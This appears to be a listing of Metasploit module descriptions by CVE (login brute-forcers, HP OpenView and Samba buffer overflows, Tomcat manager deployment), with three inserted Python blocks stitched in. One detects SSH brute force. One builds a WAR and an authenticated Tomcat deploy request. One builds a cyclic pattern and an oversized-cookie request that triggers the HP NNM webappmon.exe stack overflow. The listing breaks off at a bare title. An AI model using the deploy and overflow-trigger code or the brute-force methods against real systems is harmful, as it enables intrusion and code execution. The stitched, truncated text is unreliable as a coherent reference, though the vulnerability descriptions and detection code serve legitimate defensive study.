CVE-1999-0502
DB2 Authentication Brute Force Utility
This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

CVE-1999-0502
FTP Authentication Scanner
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.

CVE-1999-0502
Dell iDRAC default Login
This module attempts to log in to an iDRAC web server instance using the default username and password. Tested against Dell Remote Access Controller 6 - Express versions 1.50 and 1.85.

CVE-1999-0502
DLink DIR-300A / DIR-320 / DIR-615D HTTP Login Utility
This module attempts to authenticate to different DLink HTTP management services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615 Hardware revision D and D-Link DIR-320 devices. It is possible that this module also works with other models.

CVE-1999-0502
DLink DIR-615H HTTP Login Utility
This module attempts to authenticate to different DLink HTTP management services. It has been tested successfully on D-Link DIR-615 Hardware revision H devices. It is possible that this module also works with other models.

CVE-1999-0502
DLink DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility
This module attempts to authenticate to different DLink HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A devices. It is possible that this module also works with other models.

CVE-1999-0502
HTTP Login Utility
This module attempts to authenticate to an HTTP service.

CVE-1999-0502
Tomcat Application Manager Login Utility
This module simply attempts to log in to a Tomcat Application Manager instance using a specific user/pass.

CVE-1999-0502
MySQL Login Utility
This module simply queries the MySQL instance for a specific user/pass (default is root with a blank password).

CVE-1999-0502
Oracle RDBMS Login Utility
This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

CVE-1999-0502
PcAnywhere Login Scanner
This module will test pcAnywhere logins on a range of machines and report successful logins.

CVE-1999-0502
PostgreSQL Login Utility
This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

CVE-1999-0502
rexec Authentication Scanner
This module will test an rexec service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).

CVE-1999-0502
rlogin Authentication Scanner
This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).

CVE-1999-0502
rsh Authentication Scanner
This module will test a shell (rsh) service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).

CVE-1999-0502
SSH Login Check Scanner
This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.

CVE-1999-0502
Telnet Login Check Scanner
This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.

CVE-1999-0502
VMWare Authentication Daemon Login Scanner
This module will test vmauthd logins on a range of machines and report successful logins.

CVE-1999-0502
VMWare Web Login Scanner
This module attempts to authenticate to the VMware HTTP service for VMware Server, ESX, and ESXi.

CVE-1999-0502
WinRM Login Utility
This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate (NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the 'AllowUnencrypted' WinRM option must be set. Otherwise adjust the port and set the SSL options in the module as appropriate.

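Every login scanner listed above under CVE-1999-0502 leaves the same trace on the target: a burst of failed authentications from one source, usually spread over several usernames, sometimes followed by a success. The following is an added example (not part of this listing and not code from any Metasploit module) of the matching detection logic run over constructed OpenSSH auth log lines; the threshold, window, host names and addresses are assumptions chosen for the example.

```python
"""Brute-force / password-spray detection over sshd auth log lines.

Added example: not part of the original listing or of any Metasploit module.
The log lines below are constructed for this example; they follow the usual
OpenSSH syslog format. Hostnames and addresses are placeholders.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: 198.51.100.7 tries several accounts within seconds and
# then gets in as root; 203.0.113.9 is a legitimate user who mistyped once.
SAMPLE_LOG = """\
Jan 12 10:00:01 web1 sshd[2201]: Failed password for root from 198.51.100.7 port 50122 ssh2
Jan 12 10:00:02 web1 sshd[2203]: Failed password for invalid user admin from 198.51.100.7 port 50124 ssh2
Jan 12 10:00:02 web1 sshd[2205]: Failed password for invalid user oracle from 198.51.100.7 port 50126 ssh2
Jan 12 10:00:03 web1 sshd[2207]: Failed password for invalid user postgres from 198.51.100.7 port 50128 ssh2
Jan 12 10:00:04 web1 sshd[2209]: Failed password for root from 198.51.100.7 port 50130 ssh2
Jan 12 10:00:05 web1 sshd[2211]: Accepted password for root from 198.51.100.7 port 50132 ssh2
Jan 12 10:00:09 web1 sshd[2213]: Failed password for alice from 203.0.113.9 port 40100 ssh2
Jan 12 10:00:20 web1 sshd[2215]: Accepted publickey for alice from 203.0.113.9 port 40102 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+"
)


def parse_line(line, year=2024):
    """Return {'ts', 'result', 'user', 'src'} for an auth line, or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies it
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect(log_text, threshold=5, window_s=60):
    """Flag sources with >= threshold failures inside a sliding window of window_s seconds.

    Result: {src: {"failures": peak count inside the window,
                   "users": sorted usernames tried,
                   "success_after_failures": bool,
                   "compromised_user": username that finally got in, or None}}
    """
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    tried = defaultdict(set)      # src -> usernames attempted
    alerts = {}
    for e in events:
        src, q = e["src"], recent[e["src"]]
        while q and (e["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if e["result"] == "Failed":
            q.append(e["ts"])
            tried[src].add(e["user"])
            if len(q) >= threshold:
                a = alerts.setdefault(src, {"failures": 0, "users": [],
                                            "success_after_failures": False,
                                            "compromised_user": None})
                a["failures"] = max(a["failures"], len(q))
                a["users"] = sorted(tried[src])
        elif src in alerts:
            # a success from a source already flagged needs a responder, not just a ticket
            alerts[src]["success_after_failures"] = True
            alerts[src]["compromised_user"] = e["user"]
    return alerts


if __name__ == "__main__":
    for src, a in detect(SAMPLE_LOG).items():
        print(src, a)
```

The sliding window matters: the scanners above can be throttled, so a fixed per-minute bucket misses a source that spreads its attempts across a bucket boundary. The "success after failures" flag is the signal that distinguishes a scan that found a credential from background noise.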
CVE-1999-0502
SSH User Code Execution
This module utilizes a stager to upload a base64-encoded binary which is then decoded, chmod'ed and executed from the command shell.

CVE-2000-0573
WU-FTPD SITE EXEC/INDEX Format String Vulnerability
This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code.

CVE-2001-0311
HP OpenView OmniBack II Command Execution
This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the "unix/cmd/generic" payload and set CMD to your command. You can only pass a small number of characters (4) to the command line on Windows.

CVE-2001-0797
System V Derived /bin/login Extraneous Arguments Buffer Overflow
This exploit connects to a system's modem over dialup and exploits a buffer overflow vulnerability in its System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments.

CVE-2001-0797
Solaris in.telnetd TTYPROMPT Buffer Overflow
This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon.

CVE-2002-1318
Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. The Samba developers report this as: "Bug in the length checking for encrypted password change requests from clients." The bug was discovered and reported by the Debian Samba Maintainers.

CVE-2002-1473
HP-UX LPD Command Execution
This exploit abuses an unpublished vulnerability in the HP-UX LPD service. This flaw allows an unauthenticated attacker to execute arbitrary commands with the privileges of the root user. The LPD service is only exploitable when the address of the attacking system can be resolved by the target. This vulnerability was silently patched with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213.

CVE-2003-0201
Samba trans2open Overflow (*BSD x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 *BSD systems that do not have the noexec stack option set.

CVE-2003-0201
Samba trans2open Overflow (Linux x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.

CVE-2003-0201
Samba trans2open Overflow (Mac OS X PPC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.

CVE-2003-0201
Samba trans2open Overflow (Solaris SPARC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module.

CVE-2003-0694
Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
This is a proof of concept denial of service module for Sendmail versions 8.12.8 and earlier. The vulnerability is within the prescan() method when parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood of arbitrary code execution.

CVE-2005-2773
HP Openview connectedNodes.ovpl Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will be displayed to the screen.

CVE-2007-1819
HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
This module exploits a stack-based buffer overflow in the SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code.

CVE-2007-2280
HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector, and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the first one.

CVE-2007-3872
HP OpenView Operations OVTrace Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50. By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.

CVE-2007-5208
HPLIP hpssd.py From Address Arbitrary Command Execution
This module exploits a command execution vulnerability in the hpssd.py daemon of the Hewlett-Packard Linux Imaging and Printing Project. According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable. This module was written and tested using the Fedora 6 Linux distribution. On the test system, the daemon listens on localhost only and runs with root privileges. Although the configuration shows the daemon is to listen on port 2207, it actually listens on a dynamic port. NOTE: If the target system does not have a 'sendmail' command installed, this vulnerability cannot be exploited.

CVE-2007-6204
HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code.

CVE-2007-6530
HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control (version 2.1.0.1) that is included in HP LoadRunner 9.0. By passing an overly long string to the AddFolder method, an attacker may be able to execute arbitrary code.

CVE-2008-0067
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute arbitrary code.

CVE-2008-1661
DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
This module exploits a stack buffer overflow in the authentication mechanism of NSI Doubletake, which is also rebranded as HP StorageWorks. This vulnerability was found by Titon of Bastard Labs.

CVE-2008-1697
HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier. Specifically, this vulnerability is caused by a failure to properly handle user supplied input within the HTTP request, including headers and the actual URL GET request. Exploitation is tricky due to character restrictions. It was necessary to utilize an egghunter shellcode which was alphanumeric encoded by muts in the original exploit. If you plan on using this exploit for a remote shell, you will likely want to migrate to a different process as soon as possible. Any connections get reset after a short period of time. This is probably caused by some timeout handling code.

CVE-2009-0920
HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53. By sending a CGI request with a specially crafted OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code. Please note that this module only works against a specific build (i.e. NNM 7.53_01195).

CVE-2009-2685
Hewlett-Packard Power Manager Administration Buffer Overflow
This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2. By sending a specially crafted POST request with an overly long Login string, an attacker may be able to execute arbitrary code.

CVE-2009-3693
Persits XUpload ActiveX MakeHttpRequest Directory Traversal
This module exploits a directory traversal in Persits Software Inc's XUpload ActiveX control (version 3.0.0.3) that is included in HP LoadRunner 9.5. By passing a string containing "..\" sequences to the MakeHttpRequest method, an attacker is able to write arbitrary files to arbitrary locations on disk. Code execution occurs by writing to the All Users Startup Programs directory. You may want to combine this module with the use of multi/handler, since a user would have to log in for the payload to execute.

CVE-2009-3843
Tomcat Application Manager Login Utility
This module simply attempts to log in to a Tomcat Application Manager instance using a specific user/pass.

CVE-2009-3843
Apache Tomcat Manager Application Deployer Authenticated Code Execution
This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

CVE-2009-3844
HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector, and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the second one.

CVE-2009-3849
HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute arbitrary code.

CVE-2009-3999
HP Power Manager 'formExportDataLogs' Buffer Overflow
This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. By creating a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), which may result in arbitrary remote code execution under the context of 'SYSTEM'.

CVE-2009-4178
HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute arbitrary code.

CVE-2009-4179
HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute arbitrary code. This specific vulnerability is due to a call to "sprintf_new" in the "isWide" function within "ovalarm.exe". A stack buffer overflow occurs when processing an HTTP request that contains the following:
1. An "Accept-Language" header longer than 100 bytes
2. An "OVABverbose" URI variable set to "on", "true" or "1"
The vulnerability is related to "_WebSession::GetWebLocale()". NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.

CVE-2009-4188
Tomcat Application Manager Login Utility
This module simply attempts to log in to a Tomcat Application Manager instance using a specific user/pass.

CVE-2009-4188
Apache Tomcat Manager Application Deployer Authenticated Code Execution
This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

CVE-2009-4189
Tomcat Application Manager Login Utility
This module simply attempts to log in to a Tomcat Application Manager instance using a specific user/pass.

CVE-2009-4189
Apache Tomcat Manager Application Deployer Authenticated Code Execution
This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

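The Tomcat entries above (CVE-2009-3843, CVE-2009-4188 and CVE-2009-4189) describe one chain: a guessed manager credential followed by a WAR upload over PUT. The following added example, which is not code from this page or from the Metasploit module, builds a minimal WAR in memory and the deploy request that carries it, so the mechanics can be inspected offline. Assumed, because the listing does not state them: HTTP Basic authentication, the deploy endpoint /manager/deploy?path=... (Tomcat 5/6; /manager/text/deploy on Tomcat 7 and later), and the host, context path and credentials used. The JSP is a harmless banner page, not a shell.

```python
"""Minimal WAR in memory plus the Tomcat manager deploy request that carries it.

Added example: not code from the page or from the Metasploit module it describes.
Assumptions: HTTP Basic auth, the deploy endpoint /manager/deploy?path=... on
Tomcat 5/6 (/manager/text/deploy on Tomcat 7+), and placeholder host, context
and credentials. The JSP is a harmless banner page, not a shell.
"""
import base64
import io
import zipfile

# Harmless JSP: prints the container version so a deploy can be confirmed safely.
BANNER_JSP = '<%@ page contentType="text/plain" %>deployed on <%= application.getServerInfo() %>\n'

WEB_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5"/>\n'
)


def build_war(jsp_source, jsp_name="index.jsp"):
    """Return WAR bytes: a zip holding WEB-INF/web.xml and the JSP at its root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted member names of a WAR, for checking what was built."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def deploy_request(host, context, war_bytes, username, password, tomcat7=False):
    """Return the raw HTTP/1.1 PUT request (headers plus WAR body) as bytes.

    The manager reads the WAR from the request body and deploys it under
    `context`; the JSP is then reachable at http://<host><context>/index.jsp.
    """
    endpoint = "/manager/text/deploy" if tomcat7 else "/manager/deploy"
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    head = (
        f"PUT {endpoint}?path={context} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Authorization: Basic {token}\r\n"
        "Content-Type: application/octet-stream\r\n"
        f"Content-Length: {len(war_bytes)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode() + war_bytes


if __name__ == "__main__":
    war = build_war(BANNER_JSP)
    req = deploy_request("tomcat.example:8080", "/banner", war, "tomcat", "s3cret")
    print(war_entries(war), len(req), "bytes")
```

A single account in the manager role (manager-script on Tomcat 7 and later) is all that separates this request from code execution as the Tomcat service account, which is why the fix is to remove the manager application or bind it to localhost with a strong, unique password, not to hope the login utility above fails.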
CVE-2010-1552
HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. It is important to note that this vulnerability must be exploited by overwriting SEH. While the saved return address can be smashed, a function call that occurs before the function returns calls "exit".

CVE-2010-1553
HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow
This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending a specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

CVE-2010-1554
HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow
This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending a specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

CVE-2010-1555
HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow
This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending a specially crafted Hostname parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

CVE-2010-1960
HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is because overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.

CVE-2010-1961
HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from "main" within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the "getProxiedStorageAddress" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but it may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

CVE-2010-1964
HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but it may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

CVE-2010-2703
HP OpenView Network Node Manager execvp_nc Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel' parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the request size. The buffer being targeted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the "execvp_nc" function within "ov.dll" prior to v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. This vulnerability might also be triggerable via other CGI programs, however this was not fully investigated.

CVE-2010-2709
HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow a stack buffer and execute arbitrary code. The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is declared within this function. When the vulnerability is triggered, the stack trace looks like the following:
#0 ...
#1 sprintf_new(local_stack_buf, fmt, cookie);
#2 OvWwwDebug(" HTTP_COOKIE=%s\n", cookie);
#3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);
#4 sub_405ee0("nnm", "webappmon");
No validation is done on the cookie argument. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. The original advisory detailed an attack vector using the "OvJavaLocale" cookie being passed in a request to "webappmon.exe". Further research shows that several different cookie values, as well as several different CGI applications, can be used.

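Several of the NNM entries above (snmpviewer.exe, the three ovwebsnmpsrv.exe bugs, execvp_nc) come down to overwriting a saved return address or an SEH record from a buffer of known size, and the CVE-2010-2709 entry states the trigger precisely: a cookie longer than 5120 bytes. The added example below, which is not code from this page or from the Metasploit modules, reimplements the cyclic-pattern technique used to locate such an overwrite offset (the same idea as Metasploit's pattern_create and pattern_offset tools) and assembles the oversized Cookie header. The CGI path /OvCgi/webappmon.exe, the host name, the cookie name and the sample crash values are assumptions for illustration.

```python
"""Cyclic pattern and offset finder for the SEH / return-address overwrites above.

Added example: not code from the page or from the Metasploit modules it lists.
pattern_create / pattern_offset reimplement the well-known cyclic-pattern
technique; crash_request assembles the oversized cookie the CVE-2010-2709 entry
describes. The CGI path, host name and crash values are assumptions.
"""
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 chars before it repeats


def pattern_create(length):
    """'Aa0Aa1...Aa9Ab0...' cut to `length`; every 4-char window is unique up to MAX_PATTERN."""
    chunks = []
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGITS:
                chunks.append(up + lo + dg)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)   # more than one period requested: return the full period


def pattern_offset(pattern, value):
    """Offset of a 4-byte window in `pattern`, or -1 if it is not from this pattern.

    `value` is either the 4-char string itself or the 32-bit integer a debugger
    shows for the overwritten register / SEH slot; on x86 that integer is the
    four bytes in little-endian order, so the window 'Aa0A' shows up as 0x41306141.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    return pattern.find(needle)


def crash_request(host, cookie_name, pattern, cgi="/OvCgi/webappmon.exe"):
    """GET request carrying `pattern` in one cookie; per the entry, > 5120 bytes overflows."""
    return (
        f"GET {cgi} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie_name}={pattern}\r\n"
        "\r\n"
    ).encode()


if __name__ == "__main__":
    p = pattern_create(6000)
    print(len(crash_request("nnm.example", "OvJavaLocale", p)), "byte request;",
          "0x41306141 sits at offset", pattern_offset(p, 0x41306141))
```

Send the request at a debugger-attached test instance, read the value that landed in the SEH record (or in EIP, for the ovutil case where the entry says the saved return address is the target), and hand it to pattern_offset: the index it returns is where the overwrite begins inside the cookie. Because consecutive 3-character tokens never repeat a 4-byte window inside one period, the lookup is unambiguous for any buffer up to 20280 bytes, which covers every size quoted in the entries above.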
CVE-2010-3007
HP Data Protector DtbClsLogin Buffer Overflow
This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The overflow occurs during the login process, in the DtbClsLogin function provided by the dpwindtb.dll component, where Utf8Cpy (a strcpy-like function) is used in an insecure way with the username. A successful exploitation will lead to code execution with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server Service) process, which runs as SYSTEM by default.

CVE-2011-0266
HP OpenView NNM nnmRptConfig nameParams Buffer Overflow
This module exploits a vulnerability in HP NNM's nnmRptConfig.exe. A remote user can send long string data to the nameParams parameter via a POST request, which causes an overflow on the stack when the function ov.sprintf_new() is used, and gain arbitrary code execution.

CVE-2011-0267
HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow
This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during an ov.sprintf_new() call, which allows an attacker to overwrite data on the stack and gain arbitrary code execution.

CVE-2011-0276
HP OpenView Performance Insight Server Backdoor Account Code Execution
This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system, allowing the execution of arbitrary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0.

CVE-2011-0514
HP Data Protector Manager RDS DOS
This module causes a remote DoS on HP Data Protector's RDS service. By sending a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous size for malloc().

CVE-2011-0923
HP Data Protector 6.1 EXEC_CMD Command Execution
